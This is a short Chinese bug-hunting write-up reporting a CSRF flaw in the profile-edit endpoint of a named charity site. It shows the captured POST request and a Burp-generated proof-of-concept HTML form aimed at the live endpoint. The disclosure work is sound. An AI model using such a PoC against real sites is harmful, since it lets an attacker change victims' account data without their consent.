[关闭]
@1kbfree 2018-10-18T10:53:14.000000Z 字数 1011 阅读 1008

乐信公益修改资料处存在csrf

漏洞挖掘

1、打开Url:https://gy.lexinfintech.com/dist/action/index.html#/myProfile,然后点击保存并且抓包

lex.png-28.9kB

抓到的数据包如下

  1. POST /restful/post/gongyi_user_info_edit.json HTTP/1.1
  2. Host: gy.lexinfintech.com
  3. Connection: close
  4. Content-Length: 28
  5. Accept: application/json, text/plain, */*
  6. Origin: https://gy.lexinfintech.com
  7. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
  8. Content-Type: application/x-www-form-urlencoded
  9. Referer: https://gy.lexinfintech.com/dist/action/index.html
  10. Accept-Encoding: gzip, deflate
  11. Accept-Language: zh-CN,zh;q=0.9
  12. Cookie: 这是cookie
  14. name=only_free&sign=csrftest

2、经测试,没有任何限制,可以直接构造为csrf poc,如下

  1. <html>
  2.   <!-- CSRF PoC - generated by Burp Suite Professional -->
  3.   <body>
  4.   <script>history.pushState('', '', '/')</script>
  5.     <form action="https://gy.lexinfintech.com/restful/post/gongyi_user_info_edit.json" method="POST">
  6.       <input type="hidden" name="name" value="only&#95;free" />
  7.       <input type="hidden" name="sign" value="csrf_test" />
  8.       <input type="submit" value="Submit request" />
  9.     </form>
  10.   </body>
  11. </html>

3、在浏览器处打开

lex.png-18.6kB

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注